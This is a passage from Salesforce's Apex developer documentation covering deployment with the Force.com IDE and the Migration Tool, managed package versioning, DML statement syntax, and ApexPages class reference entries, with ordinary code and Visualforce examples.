6. Use the system.assertEquals method to verify that the expected result is returned:
System.assertEquals(u2Miles, totalMiles);
437
You can't develop Apex in your Salesforce production organization. Live users accessing the system
while you're developing can destabilize your data or corrupt your application. Instead, you must do all
your development work in either a sandbox or a Developer Edition organization.
You can deploy Apex using:
Change Sets
SOAP API
438
Deploying Apex
EDITIONS
Available in
Enterprise
Performance
Unlimited
Database.com
The Force.com IDE is a plug-in for the Eclipse IDE. The Force.com IDE provides a unified interface for building and deploying Force.com
applications. Designed for developers and development teams, the IDE provides tools to accelerate Force.com application development,
including source code editors, test execution tools, wizards and integrated help. This tool includes basic color-coding, outline view,
integrated unit testing, and auto-compilation on save with error message display.
Note: The Force.com IDE is a free resource provided by Salesforce to support its users and partners but isn't considered part of
our services for purposes of the Salesforce Master Subscription Agreement.
To deploy Apex from a local project in the Force.com IDE to a Salesforce organization, use the Deploy to Server wizard.
Note: If you deploy to a production organization:
At least 75% of your Apex code must be covered by unit tests, and all of those tests must complete successfully.
Note the following.
When deploying to a production organization, every unit test in your organization namespace is executed.
Calls to System.debug are not counted as part of Apex code coverage.
Test methods and test classes are not counted as part of Apex code coverage.
While only 75% of your Apex code must be covered by tests, your focus shouldn't be on the percentage of code that is
covered. Instead, you should make sure that every use case of your application is covered, including positive and negative
cases, as well as bulk and single records. This should lead to 75% or more of your code being covered by unit tests.
Every trigger must have some test coverage.
All classes and triggers must compile successfully.
For more information on how to use the Deploy to Server wizard, see Deploying Code with the Force.com IDE in the Force.com IDE
documentation, which is available within Eclipse.
439
Deploying Apex
1. Visit http://java.sun.com/javase/downloads/index.jsp and install Java JDK, Version 6.1 or greater on the
deployment machine.
2. Visit http://ant.apache.org/ and install Apache Ant, Version 1.6 or greater on the deployment machine.
3. Set up the environment variables (such as ANT_HOME, JAVA_HOME, and PATH) as specified in the Ant Installation Guide at
http://ant.apache.org/manual/install.html.
4. Verify that the JDK and Ant are installed correctly by opening a command prompt, and entering ant version. Your output
should look something like this:
Apache Ant version 1.7.0 compiled on December 13 2006
5. Log in to Salesforce on your deployment machine. From Setup, click Develop > Tools, then click Force.com Migration Tool.
6. Unzip the downloaded file to the directory of your choice. The Zip file contains the following:
A Readme.html file that explains how to use the tools
A Jar file containing the ant task: ant-salesforce.jar
A sample folder containing:
A codepkg\classes folder that contains SampleDeployClass.cls and SampleFailingTestClass.cls
A codepkg\triggers folder that contains SampleAccountTrigger.trigger
A mypkg\objects folder that contains the custom objects used in the examples
A removecodepkg folder that contains XML files for removing the examples from your organization
A sample build.properties file that you must edit, specifying your credentials, in order to run the sample ant tasks
in build.xml
A sample build.xml file, that exercises the deploy and retrieve API calls
7. Copy the ant-salesforce.jar file from the unzipped file into the ant lib directory. The ant lib directory is located in the root
folder of your Ant installation.
8. Open the sample subdirectory in the unzipped file.
9. Edit the build.properties file:
a. Enter your Salesforce production organization username and password for the sf.user and sf.password fields,
respectively.
Note:
The username you specify should have the authority to edit Apex.
If you are using the Force.com Migration Tool from an untrusted network, append a security token to the password.
To learn more about security tokens, see Resetting Your Security Token in the Salesforce online help.
b. If you are deploying to a sandbox organization, change the sf.serverurl field to https://test.salesforce.com.
10. Open a command window in the sample directory.
11. Enter ant deployCode. This runs the deploy API call, using the sample class and Account trigger provided with the Force.com
Migration Tool.
The ant deployCode calls the Ant target named deploy in the build.xml file.
<!-- Shows deploying code & running tests for package 'codepkg' -->
<target name="deployCode">
<!-- Upload the contents of the "codepkg" package, running the tests for just 1
440
Deploying Apex
Understanding deploy
class -->
<sf:deploy username="${sf.username}" password="${sf.password}"
serverurl="${sf.serverurl}" deployroot="codepkg">
<runTest>SampleDeployClass</runTest>
</sf:deploy>
</target>
See the Force.com Migration Tool Guide for full details about the Force.com Migration Tool.
Understanding deploy
The deploy call completes successfully only if all of the following must be true.
At least 75% of your Apex code must be covered by unit tests, and all of those tests must complete successfully.
Note the following.
When deploying to a production organization, every unit test in your organization namespace is executed.
Calls to System.debug are not counted as part of Apex code coverage.
Test methods and test classes are not counted as part of Apex code coverage.
While only 75% of your Apex code must be covered by tests, your focus shouldn't be on the percentage of code that is covered.
Instead, you should make sure that every use case of your application is covered, including positive and negative cases, as well
as bulk and single records. This should lead to 75% or more of your code being covered by unit tests.
Every trigger must have some test coverage.
All classes and triggers must compile successfully.
You cannot run more than one deploy Metadata API call at the same time.
The Force.com Migration Tool provides the task deploy which can be incorporated into your deployment scripts. You can modify the
build.xml sample to include your organization's classes and triggers. The properties of the deploy task are as follows:
username
The password associated for logging into the Salesforce production organization.
serverURL
The URL for the Salesforce server you are logging into. If you do not specify a value, the default is www.salesforce.com.
deployRoot
The local directory that contains the Apex classes and triggers, as well as any other metadata, that you want to deploy. The best way
to create the necessary file structure is to retrieve it from your organization or sandbox. See Understanding retrieveCode on
page 442 for more information.
441
Deploying Apex
Understanding retrieveCode
Apex class files must be in a subdirectory named classes. You must have two files for each class, named as follows:
classname.cls
classname.cls-meta.xml
For example, MyClass.cls and MyClass.cls-meta.xml. The -meta.xml file contains the API version and the status
(active/inactive) of the class.
Apex trigger files must be in a subdirectory named triggers. You must have two files for each trigger, named as follows:
triggername.trigger
triggername.trigger-meta.xml
For example, MyTrigger.trigger and MyTrigger.trigger-meta.xml. The -meta.xml file contains the API
version and the status (active/inactive) of the trigger.
The root directory contains an XML file package.xml that lists all the classes, triggers, and other objects to be deployed.
The root directory optionally contains an XML file destructiveChanges.xml that lists all the classes, triggers, and other
objects to be deleted from your organization.
checkOnly
Specifies whether the classes and triggers are deployed to the target environment or not. This property takes a Boolean value: true
if you do not want to save the classes and triggers to the organization, false otherwise. If you do not specify a value, the default
is false.
runTests
The name of the class that contains the unit tests that you want to run.
Note: This parameter is ignored when deploying to a Salesforce production organization. Every unit test in your organization
namespace is executed.
runAllTests
This property takes a Boolean value: true if you want run all tests in your organization, false if you do not. You should not
specify a value for runTests if you specify true for runAllTests.
Note: This parameter is ignored when deploying to a Salesforce production organization. Every unit test in your organization
namespace is executed.
Understanding retrieveCode
Use the retrieveCode call to retrieve classes and triggers from your sandbox or production organization. During the normal deploy
cycle, you would run retrieveCode prior to deploy, in order to obtain the correct directory structure for your new classes and
triggers. However, for this example, deploy is used first, to ensure that there is something to retrieve.
To retrieve classes and triggers from an existing organization, use the retrieve ant task as illustrated by the sample build target ant
retrieveCode:
<target name="retrieveCode">
<!-- Retrieve the contents listed in the file codepkg/package.xml into the codepkg
directory -->
<sf:retrieve username="${sf.username}" password="${sf.password}"
serverurl="${sf.serverurl}" retrieveTarget="codepkg"
unpackaged="codepkg/package.xml"/>
</target>
The file codepkg/package.xml lists the metadata components to be retrieved. In this example, it retrieves two classes and one
trigger. The retrieved files are put into the directory codepkg, overwriting everything already in the directory.
442
Deploying Apex
Understanding retrieveCode
The password associated for logging into the Salesforce production organization.
serverURL
The URL for the Salesforce server you are logging into. If you do not specify a value, the default is www.salesforce.com.
apiversion
Which version of the Metadata API at which the files should be retrieved.
retrieveTarget
The directory into which the files should be copied.
unpackaged
The name of file that contains the list of files that should be retrieved. You should either specify this parameter or packageNames.
packageNames
The name of the package or packages that should be retrieved.
Table 1: build.xml retrieve target field settings
Field
Description
username
password
serverurl
pollWaitMillis
maxPoll
retrieveTarget
unpackaged
singlePackage
packageNames
specificFiles
443
Deploying Apex
Understanding runTests()
Understanding runTests()
In addition to using deploy() with the Force.com Migration Tool, you can also use the runTests() API call. This call takes the
following properties:
class
The name of the class that contains the unit tests. You can specify this property more than once.
alltests
Specifies whether to run all tests. This property takes a Boolean value: true if you want to run all tests, false otherwise.
namespace
The namespace that you would like to test. If you specify a namespace, all the tests in that namespace are executed.
444
What is a Package?
Package Versions
Deprecating Apex
Behavior in Package
Versions
As an ISV or Salesforce partner, you can distribute Apex code to customer organizations using packages.
This chapter describes packages and package versioning.
445
What is a Package?
What is a Package?
A package is a container for something as small as an individual component or as large as a set of related apps. After creating a package,
you can distribute it to other Salesforce users and organizations, including those outside your company. An organization can create a
single managed package that can be downloaded and installed by many different organizations. Managed packages differ from
unmanaged packages by having some locked components, allowing the managed package to be upgraded later. Unmanaged packages
do not include locked components and cannot be upgraded.
Package Versions
A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release.
Unmanaged packages are not upgradeable, so each package version is simply a set of components for distribution. A package version
has more significance for managed packages. Packages can exhibit different behavior for different versions. Publishers can use package
versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without breaking
existing customer integrations using the package.
When an existing subscriber installs a new package version, there is still only one instance of each component in the package, but the
components can emulate older versions. For example, a subscriber may be using a managed package that contains an Apex class. If the
publisher decides to deprecate a method in the Apex class and release a new package version, the subscriber still sees only one instance
of the Apex class after installing the new version. However, this Apex class can still emulate the previous version for any code that
references the deprecated method in the older version.
Note the following when developing Apex in managed packages:
The code contained in an Apex class or trigger that is part of a managed package is automatically obfuscated and cannot be viewed
in an installing organization. The only exceptions are methods declared as global, meaning that the method signatures can be
viewed in an installing organization.
Managed packages receive a unique namespace. This namespace is automatically prepended to your class names, methods, variables,
and so on, which helps prevent duplicate names in the installers organization.
In a single transaction, you can only reference 10 unique namespaces. For example, suppose you have an object that executes a
class in a managed package when the object is updated. Then that class updates a second object, which in turn executes a different
class in a different package. Even though the second package wasnt accessed directly by the first, because it occurs in the same
transaction, its included in the number of namespaces being accessed in a single transaction.
Package developers can use the deprecated annotation to identify methods, classes, exceptions, enums, interfaces, and variables
that can no longer be referenced in subsequent releases of the managed package in which they reside. This is useful when you are
refactoring code in managed packages as the requirements evolve.
You can write test methods that change the package version context to a different package version by using the system method
runAs.
You cannot add a method to a global interface or an abstract method to a global class after the interface or class has been uploaded
in a Managed - Released package version. If the class in the Managed - Released package is virtual, the method that you can add to
it must also be virtual and must have an implementation.
Apex code contained in an unmanaged package that explicitly references a namespace cannot be uploaded.
446
Deprecating Apex
Deprecating Apex
Package developers can use the deprecated annotation to identify methods, classes, exceptions, enums, interfaces, and variables
that can no longer be referenced in subsequent releases of the managed package in which they reside. This is useful when you are
refactoring code in managed packages as the requirements evolve. After you upload another package version as Managed - Released,
new subscribers that install the latest package version cannot see the deprecated elements, while the elements continue to function
for existing subscribers and API integrations. A deprecated item, such as a method or a class, can still be referenced internally by the
package developer.
Note: You cannot use the deprecated annotation in Apex classes or triggers in unmanaged packages.
Package developers can use Managed - Beta package versions for evaluation and feedback with a pilot set of users in different Salesforce
organizations. If a developer deprecates an Apex identifier and then uploads a version of the package as Managed - Beta, subscribers
that install the package version still see the deprecated identifier in that package version. If the package developer subsequently uploads
a Managed - Released package version, subscribers will no longer see the deprecated identifier in the package version after they install
it.
447
For a full list of methods that work with package versions, see Version Class and the System.requestVersion method in System
Class.
The request context is persisted if a class in the installed package invokes a method in another class in the package. For example, a
subscriber has installed a GeoReports package that contains CountryUtil and ContinentUtil Apex classes. The subscriber creates a new
GeoReportsEx class and uses the version settings to bind it to version 2.3 of the GeoReports package. If GeoReportsEx invokes a method
in ContinentUtil which internally invokes a method in CountryUtil, the request context is propagated from ContinentUtil to CountryUtil
and the System.requestVersion method in CountryUtil returns version 2.3 of the GeoReports package.
448
The following test class uses the runAs method to verify the trigger's behavior with and without a specific version:
@isTest
private class OppTriggerTests{
static testMethod void testOppValidation(){
// Set up 50% opportunity with no description
Opportunity o = new Opportunity();
o.Name = 'Test Job';
o.Probability = 50;
o.StageName = 'Prospect';
o.CloseDate = System.today();
// Test running as latest package version
try{
insert o;
}
catch(System.DMLException e){
System.assert(
e.getMessage().contains(
'All deals over 50% require a description'),
e.getMessage());
}
// Run test as managed package version 1.0
System.runAs(new Version(1,0)){
try{
449
insert o;
}
catch(System.DMLException e){
System.assert(false, e.getMessage());
}
}
// Set up a closed won opportunity with no lead source
o = new Opportunity();
o.Name = 'Test Job';
o.Probability = 50;
o.StageName = 'Prospect';
o.CloseDate = System.today();
o.StageName = 'Closed Won';
// Test running as latest package version
try{
insert o;
}
catch(System.DMLException e){
System.assert(
e.getMessage().contains(
'A lead source must be provided for all Closed Won deals'),
e.getMessage());
}
// Run test as managed package version 1.0
System.runAs(new Version(1,0)){
try{
insert o;
}
catch(System.DMLException e){
System.assert(
e.getMessage().contains(
'A lead source must be provided for all Closed Won deals'),
e.getMessage());
}
}
}
}
450
CHAPTER 16 Reference
The Apex reference contains information about DML statements, and the built-in Apex classes and interfaces.
DML Statements
DML statements part of the Apex programming language and are described in Apex DML Statements.
Apex Classes and Interfaces
Apex classes and interfaces are grouped by the namespaces theyre contained in. For example, the Database class is in the
System namespace. To find static methods of the Database system class, such as the insert method, nagivate to System
Namespace > Database Class. The result classes associated with the Database methods, such as Database.SaveResult,
are part of the Database namespace and are listed under Database Namespace.
In addition, SOAP API methods and objects are available for Apex. See SOAP API and SOAP Headers for Apex on page 1880 in the Appendices
section.
IN THIS SECTION:
Apex DML Operations
ApexPages Namespace
The ApexPages namespace provides classes used in Visualforce controllers.
Approval Namespace
The Approval namespace provides classes and methods for approval processes.
Auth Namespace
The Auth namespace provides an interface and classes for single sign-on into Salesforce and session security management.
Canvas Namespace
The Canvas namespace provides an interface and classes for canvas apps in Salesforce.
ChatterAnswers Namespace
The ChatterAnswers namespace provides an interface for creating Account records.
ConnectApi Namespace
The ConnectApi namespace (also called Chatter in Apex) provides classes for accessing the same data available in Chatter REST
API. Use Chatter in Apex to create custom Chatter experiences in Salesforce.
Database Namespace
The Database namespace provides classes used with DML operations.
Dom Namespace
The Dom namespace provides classes and methods for approval processing.
Flow Namespace
The Flow namespace provides a class for advanced Visualforce controller access to flows.
KbManagement Namespace
The KbManagement namespace provides a class for managing knowledge articles.
451
Reference
Messaging Namespace
The Messaging namespace provides classes and methods for Salesforce outbound and inbound email functionality.
Process Namespace
The Process namespace provides an interface and classes for pass data between your organization and a flow.
QuickAction Namespace
The QuickAction namespace provides classes and methods for publisher actions.
Reports Namespace
The Reports namespace provides classes for accessing the same data as is available in the Salesforce1 Reporting REST API.
Schema Namespace
The Schema namespace provides classes and methods for schema metadata information.
Site Namespace
The Site namespace provides an interface for rewriting Sites URLs.
Support Namespace
The Support namespace provides an interface used for Case Feed.
System Namespace
The System namespace provides classes and methods for core Apex functionality.
Insert Statement
The insert DML operation adds one or more sObjects, such as individual accounts or contacts, to your organizations data. insert
is analogous to the INSERT statement in SQL.
452
Reference
Syntax
insert sObject
insert sObject[]
Example
The following example inserts an account named 'Acme':
Account newAcct = new Account(name = 'Acme');
try {
insert newAcct;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
Update Statement
The update DML operation modifies one or more existing sObject records, such as individual accounts or contactsinvoice statements,
in your organizations data. update is analogous to the UPDATE statement in SQL.
Syntax
update sObject
update sObject[]
Example
The following example updates the BillingCity field on a single account named 'Acme':
Account a = new Account(Name='Acme2');
insert(a);
Account myAcct = [SELECT Id, Name, BillingCity FROM Account WHERE Id = :a.Id];
myAcct.BillingCity = 'San Francisco';
try {
update myAcct;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
Upsert Statement
The upsert DML operation creates new records and updates sObject records within a single statement, using a specified field to
determine the presence of existing objects, or the ID field if no field is specified.
453
Reference
Syntax
upsert sObject opt_external_id
upsert sObject[] opt_external_id
opt_external_id is an optional variable that specifies the custom field that should be used to match records that already exist in
your organization's data. This custom field must be created with the External Id attribute selected. Additionally, if the field does
not have the Unique attribute selected, the context user must have the View All object-level permission for the target object or the
View All Data permission so that upsert does not accidentally insert a duplicate record.
Example
This example performs an upsert of a list of accounts.
List<Account> acctList = new List<Account>();
// Fill the accounts list with some accounts
try {
upsert acctList;
} catch (DmlException e) {
}
This next example performs an upsert of a list of accounts using a foreign key for matching existing records, if any.
List<Account> acctList = new List<Account>();
// Fill the accounts list with some accounts
try {
// Upsert using an external ID field
upsert acctList myExtIDField__c;
} catch (DmlException e) {
}
454
Reference
Delete Statement
The delete DML operation deletes one or more existing sObject records, such as individual accounts or contacts, from your organizations
data. delete is analogous to the delete() statement in the SOAP API.
Syntax
delete sObject | ID
delete sObject[] | ID[]
Example
The following example deletes all accounts that are named 'DotCom':
Account[] doomedAccts = [SELECT Id, Name FROM Account
WHERE Name = 'DotCom'];
try {
delete doomedAccts;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
Undelete Statement
The undelete DML operation restores one or more existing sObject records, such as individual accounts or contacts, from your
organizations Recycle Bin. undelete is analogous to the UNDELETE statement in SQL.
Syntax
undelete sObject | ID
undelete sObject[] | ID[]
Example
The following example undeletes an account named 'Trump'. The ALL ROWS keyword queries all rows for both top level and aggregate
relationships, including deleted records and archived activities.
Account[] savedAccts = [SELECT Id, Name FROM Account WHERE Name = 'Trump' ALL ROWS];
try {
undelete savedAccts;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
455
Reference
ApexPages Namespace
Merge Statement
The merge statement merges up to three records of the same sObject type into one of the records, deleting the others, and re-parenting
any related records.
Note: This DML operation does not have a matching Database system method.
Syntax
merge sObject sObject
merge sObject sObject[]
merge sObject ID
merge sObject ID[]
The first parameter represents the master record into which the other records are to be merged. The second parameter represents the
one or two other records that should be merged and then deleted. You can pass these other records into the merge statement as a
single sObject record or ID, or as a list of two sObject records or IDs.
Example
The following example merges two accounts named 'Acme Inc.' and 'Acme' into a single record:
List<Account> ls = new List<Account>{new Account(name='Acme Inc.'),new Account(name='Acme')};
insert ls;
Account masterAcct = [SELECT Id, Name FROM Account WHERE Name = 'Acme Inc.' LIMIT 1];
Account mergeAcct = [SELECT Id, Name FROM Account WHERE Name = 'Acme' LIMIT 1];
try {
merge masterAcct mergeAcct;
} catch (DmlException e) {
// Process exception here
}
Note: For more information on processing DmlExceptions, see Bulk DML Exception Handling on page 129.
ApexPages Namespace
The ApexPages namespace provides classes used in Visualforce controllers.
The following are the classes in the ApexPages namespace.
IN THIS SECTION:
Action Class
You can use ApexPages.Action to create an action method that you can use in a Visualforce custom controller or controller
extension.
Component Class
Represents a dynamic Visualforce component in Apex.
456
Reference
Action Class
IdeaStandardController Class
IdeaStandardController objects offer Ideas-specific functionality in addition to what is provided by the
StandardController.
IdeaStandardSetController Class
IdeaStandardSetController objects offer Ideas-specific functionality in addition to what is provided by the
StandardSetController.
KnowledgeArticleVersionStandardController Class
KnowledgeArticleVersionStandardController objects offer article-specific functionality in addition to what is
provided by the StandardController.
Message Class
Contains validation errors that occur when the end user saves the page when using a standard controller.
StandardController Class
Use a StandardController when defining an extension for a standard controller.
StandardSetController Class
StandardSetController objects allow you to create list controllers similar to, or as extensions of, the pre-built Visualforce
Action Class
You can use ApexPages.Action to create an action method that you can use in a Visualforce custom controller or controller
extension.
Namespace
ApexPages
Usage
For example, you could create a saveOver method on a controller extension that performs a custom save.
Instantiation
The following code snippet illustrates how to instantiate a new ApexPages.Action object that uses the save action:
ApexPages.Action saveAction = new ApexPages.Action('{!save}');
Example
In the following example, when the user updates or creates a new Account and clicks the Save button, in addition to the account being
updated or created, the system writes a message to the system debug log. This example extends the standard controller for Account.
The following is the controller extension.
public class pageCon{
public PageReference RedirectToStep2(){
// ...
// ...
457
Reference
Action Class
return Page.Step2;
}
}
The following is the Visualforce markup for a page that uses the above controller extension.
<apex:component>
<apex:attribute name="actionToInvoke" type="ApexPages.Action" ... />
...
<apex:commandButton value="Perform Controller Action" action="{!actionToInvoke}"/>
</apex:component>
<apex:page controller="pageCon">
...
<c:myComp actionToInvoke="{!RedirectToStep2}"/>
</apex:page>
For information on the debug log, see Viewing Debug Logs in the Salesforce online help.
IN THIS SECTION:
Action Constructors
Action Methods
Action Constructors
The following are constructors for Action.
IN THIS SECTION:
Action(String)
Creates a new instance of the ApexPages.Action class using the specified action.
Action(String)
Creates a new instance of the ApexPages.Action class using the specified action.
Signature
public Action(String action)
Parameters
action
Type: String
The action.
Action Methods
The following are methods for Action. All are instance methods.
458
Reference
Component Class
IN THIS SECTION:
getExpression()
Returns the expression that is evaluated when the action is invoked.
invoke()
Invokes the action.
getExpression()
Returns the expression that is evaluated when the action is invoked.
Signature
public String getExpression()
Return Value
Type: String
invoke()
Invokes the action.
Signature
public System.PageReference invoke()
Return Value
Type: System.PageReference
Component Class
Represents a dynamic Visualforce component in Apex.
Namespace
ApexPages
459
Reference
Component Class
expressions
Sets the content of an attribute using the expression language notation. The notation for this is
expressions.name_of_attribute.
facets
Sets the content of a facet to a dynamic component. The notation for this is facet.name_of_facet.
childComponents
Returns a reference to the child components for the component.
Signature
public List <ApexPages.Component> childComponents {get; set;}
Property Value
Type: List<ApexPages.Component>
Example
Component.Apex.PageBlock pageBlk = new Component.Apex.PageBlock();
Component.Apex.PageBlockSection pageBlkSection = new
Component.Apex.PageBlockSection(title='dummy header');
pageBlk.childComponents.add(pageBlkSection);
expressions
Sets the content of an attribute using the expression language notation. The notation for this is expressions.name_of_attribute.
Signature
public String expressions {get; set;}
Property Value
Type: String
Example
Component.Apex.InputField inpFld = new
Component.Apex.InputField();
inpField.expressions.value = '{!Account.Name}';
inpField.expressions.id = '{!$User.FirstName}';
facets
Sets the content of a facet to a dynamic component. The notation for this is facet.name_of_facet.
460
Reference
IdeaStandardController Class
Signature
public String facets {get; set;}
Property Value
Type: String
Usage
Note: This property is only accessible by components that support facets.
Example
Component.Apex.DataTable myDT = new
Component.Apex.DataTable();
ApexPages.Component.OutputText footer = new
Component.Apex.OutputText(value='Footer Copyright');
myDT.facets.footer = footer;
IdeaStandardController Class
IdeaStandardController objects offer Ideas-specific functionality in addition to what is provided by the
StandardController.
Namespace
ApexPages
Usage
A method in the IdeaStandardController object is called by and operated on a particular instance of an IdeaStandardController.
Note: The IdeaStandardSetController and IdeaStandardController classes are currently available through
a limited release program. For information on enabling these classes for your organization, contact your Salesforce representative.
In addition to the methods listed in this class, the IdeaStandardController class inherits all the methods associated with the
StandardController class.
Instantiation
An IdeaStandardController object cannot be instantiated. An instance can be obtained through a constructor of a custom extension
controller when using the standard ideas controller.
461
Reference
IdeaStandardController Class
Example
The following example shows how an IdeaStandardController object can be used in the constructor for a custom list controller. This
example provides the framework for manipulating the comment list data before displaying it on a Visualforce page.
public class MyIdeaExtension {
private final ApexPages.IdeaStandardController ideaController;
public MyIdeaExtension(ApexPages.IdeaStandardController controller) {
ideaController = (ApexPages.IdeaStandardController)controller;
}
public List<IdeaComment> getModifiedComments() {
IdeaComment[] comments = ideaController.getCommentList();
// modify comments here
return comments;
}
}
The following Visualforce markup shows how the IdeaStandardController example shown above can be used in a page. This page must
be named detailPage for this example to work.
Note: For the Visualforce page to display the idea and its comments, in the following example you need to specify the ID of a
specific idea (for example, /apex/detailPage?id=<ideaID>) whose comments you want to view.
<!-- page named detailPage -->
<apex:page standardController="Idea" extensions="MyIdeaExtension">
<apex:pageBlock title="Idea Section">
<ideas:detailOutputLink page="detailPage" ideaId="{!idea.id}">{!idea.title}
</ideas:detailOutputLink>
<br/><br/>
<apex:outputText >{!idea.body}</apex:outputText>
</apex:pageBlock>
<apex:pageBlock title="Comments Section">
<apex:dataList var="a" value="{!modifiedComments}" id="list">
{!a.commentBody}
</apex:dataList>
<ideas:detailOutputLink page="detailPage" ideaId="{!idea.id}"
pageOffset="-1">Prev</ideas:detailOutputLink>
|
<ideas:detailOutputLink page="detailPage" ideaId="{!idea.id}"
pageOffset="1">Next</ideas:detailOutputLink>
</apex:pageBlock>
</apex:page>
SEE ALSO:
StandardController Class
IdeaStandardController Methods
The following are instance methods for IdeaStandardController.
462
Reference
IdeaStandardSetController Class
IN THIS SECTION:
getCommentList()
Returns the list of read-only comments from the current page.
getCommentList()
Returns the list of read-only comments from the current page.
Signature
public IdeaComment[] getCommentList()
Return Value
Type: IdeaComment[]
This method returns the following comment properties:
id
commentBody
createdDate
createdBy.Id
createdBy.communityNickname
IdeaStandardSetController Class
IdeaStandardSetController objects offer Ideas-specific functionality in addition to what is provided by the
StandardSetController.
Namespace
ApexPages
Usage
Note: The IdeaStandardSetController and IdeaStandardController classes are currently available through
a limited release program. For information on enabling these classes for your organization, contact your Salesforce representative.
In addition to the method listed above, the IdeaStandardSetController class inherits the methods associated with the
StandardSetController.
Note: The methods inherited from the StandardSetController cannot be used to affect the list of ideas returned by
the getIdeaList method.
Instantiation
An IdeaStandardSetController object cannot be instantiated. An instance can be obtained through a constructor of a custom extension
controller when using the standard list controller for ideas.
463
Reference
IdeaStandardSetController Class
The following Visualforce markup shows how the IdeaStandardSetController example shown above and the
<ideas:profileListOutputLink> component can display a profile page that lists the recent replies, submitted ideas, and
votes associated with a user. Because this example does not identify a specific user ID, the page automatically shows the profile page
for the current logged in user. This page must be named profilePage in order for this example to work:
<!-- page named profilePage -->
<apex:page standardController="Idea" extensions="MyIdeaProfileExtension"
recordSetVar="ideaSetVar">
<apex:pageBlock >
<ideas:profileListOutputLink sort="recentReplies" page="profilePage">
Recent Replies</ideas:profileListOutputLink>
|
<ideas:profileListOutputLink sort="ideas" page="profilePage">Ideas Submitted
</ideas:profileListOutputLink>
|
<ideas:profileListOutputLink sort="votes" page="profilePage">Ideas Voted
</ideas:profileListOutputLink>
</apex:pageBlock>
<apex:pageBlock >
<apex:dataList value="{!modifiedIdeas}" var="ideadata">
<ideas:detailoutputlink ideaId="{!ideadata.id}" page="viewPage">
{!ideadata.title}</ideas:detailoutputlink>
</apex:dataList>
</apex:pageBlock>
</apex:page>
In the previous example, the <ideas:detailoutputlink> component links to the following Visualforce markup that displays
the detail page for a specific idea. This page must be named viewPage in order for this example to work:
<!-- page named viewPage -->
<apex:page standardController="Idea">
<apex:pageBlock title="Idea Section">
<ideas:detailOutputLink page="viewPage" ideaId="{!idea.id}">{!idea.title}
</ideas:detailOutputLink>
<br/><br/>
464
Reference
IdeaStandardSetController Class
<apex:outputText>{!idea.body}</apex:outputText>
</apex:pageBlock>
</apex:page>
Example: Displaying a List of Top, Recent, and Most Popular Ideas and Comments
The following example shows how an IdeaStandardSetController object can be used in the constructor for a custom list controller:
Note: You must have created at least one idea for this example to return any ideas.
public class MyIdeaListExtension {
private final ApexPages.IdeaStandardSetController ideaSetController;
public MyIdeaListExtension (ApexPages.IdeaStandardSetController controller) {
ideaSetController = (ApexPages.IdeaStandardSetController)controller;
}
public List<Idea> getModifiedIdeas() {
Idea[] ideas = ideaSetController.getIdeaList();
// modify ideas here
return ideas;
}
}
The following Visualforce markup shows how the IdeaStandardSetController example shown above can be used with the
<ideas:listOutputLink> component to display a list of recent, top, and most popular ideas and comments. This page must
be named listPage in order for this example to work:
<!-- page named listPage -->
<apex:page standardController="Idea" extensions="MyIdeaListExtension"
recordSetVar="ideaSetVar">
<apex:pageBlock >
<ideas:listOutputLink sort="recent" page="listPage">Recent Ideas
</ideas:listOutputLink>
|
<ideas:listOutputLink sort="top" page="listPage">Top Ideas
</ideas:listOutputLink>
|
<ideas:listOutputLink sort="popular" page="listPage">Popular Ideas
</ideas:listOutputLink>
|
<ideas:listOutputLink sort="comments" page="listPage">Recent Comments
</ideas:listOutputLink>
</apex:pageBlock>
<apex:pageBlock >
<apex:dataList value="{!modifiedIdeas}" var="ideadata">
<ideas:detailoutputlink ideaId="{!ideadata.id}" page="viewPage">
{!ideadata.title}</ideas:detailoutputlink>
</apex:dataList>
</apex:pageBlock>
</apex:page>
465
Reference
IdeaStandardSetController Class
In the previous example, the <ideas:detailoutputlink> component links to the following Visualforce markup that displays
the detail page for a specific idea. This page must be named viewPage.
<!-- page named viewPage -->
<apex:page standardController="Idea">
<apex:pageBlock title="Idea Section">
<ideas:detailOutputLink page="viewPage" ideaId="{!idea.id}">{!idea.title}
</ideas:detailOutputLink>
<br/><br/>
<apex:outputText>{!idea.body}</apex:outputText>
</apex:pageBlock>
</apex:page>
SEE ALSO:
StandardSetController Class
IdeaStandardSetController Methods
The following are instance methods for IdeaStandardSetController.
IN THIS SECTION:
getIdeaList()
Returns the list of read-only ideas in the current page set.
getIdeaList()
Returns the list of read-only ideas in the current page set.
Signature
public Idea[] getIdeaList()
Return Value
Type: Idea[]
Usage
You can use the <ideas:listOutputLink>, <ideas:profileListOutputLink>, and
<ideas:detailOutputLink> components to display profile pages as well as idea list and detail pages (see the examples below).
The following is a list of properties returned by this method:
Body
Categories
Category
CreatedBy.CommunityNickname
CreatedBy.Id
CreatedDate
466
Reference
KnowledgeArticleVersionStandardController Class
Id
LastCommentDate
LastComment.Id
LastComment.CommentBody
LastComment.CreatedBy.CommunityNickname
LastComment.CreatedBy.Id
NumComments
Status
Title
VoteTotal
KnowledgeArticleVersionStandardController Class
KnowledgeArticleVersionStandardController objects offer article-specific functionality in addition to what is provided
by the StandardController.
Namespace
ApexPages
Usage
In addition to the method listed above, the KnowledgeArticleVersionStandardController class inherits all the methods
associated with StandardController.
Note: Though inherited, the edit, delete, and save methods don't serve a function when used with the
KnowledgeArticleVersionStandardController class.
Example
The following example shows how a KnowledgeArticleVersionStandardController object can be used to create a
custom extension controller. In this example, you create a class named AgentContributionArticleController that allows
customer-support agents to see pre-populated fields on the draft articles they create while closing cases.
Prerequisites:
1. Create an article type called FAQ. For instructions, see Defining Article Types in the Salesforce online help.
2. Create a text custom field called Details. For instructions, see Adding Custom Fields to Article Types in the Salesforce online
help.
3. Create a category group called Geography and assign it to a category called USA. For instructions, see Creating and Modifying
Category Groups and Adding Data Categories to Category Groups in the Salesforce online help.
4. Create a category group called Topics and assign it a category called Maintenance.
/** Custom extension controller for the simplified article edit page that
appears when an article is created on the close-case page.
*/
